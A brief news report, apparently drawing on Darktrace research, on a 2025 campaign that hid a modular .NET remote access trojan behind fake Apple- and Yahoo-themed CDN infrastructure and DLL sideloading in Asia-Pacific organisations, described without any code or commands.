Hackers spent months hiding malware behind fake Apple-themed internet infrastructure and similarly bogus Windows pop-ups to infiltrate organizations across the Asia-Pacific region without triggering obvious security alarms. Here’s how they did it.
Attackers impersonated CDN infrastructure. Image credit: Darktrace
Attackers impersonated CDN infrastructure. Image credit: DarktraceThe malware was disguised as trusted Apple and Yahoo-themed internet infrastructure. Legitimate Windows software and DLL sideloading concealed a modular remote access trojan within ordinary network traffic.
Activity first appeared in customer networks in late September 2025 and primarily affected organizations in the Asia-Pacific and Japan region. Researchers observed repeated abuse of trusted executables and fake CDN infrastructure inside corporate environments.
Attackers impersonated CDN infrastructure tied to major technology brands to make malicious traffic appear legitimate. Trusted Windows binaries and DLL sideloading then launched a modular .NET remote access trojan.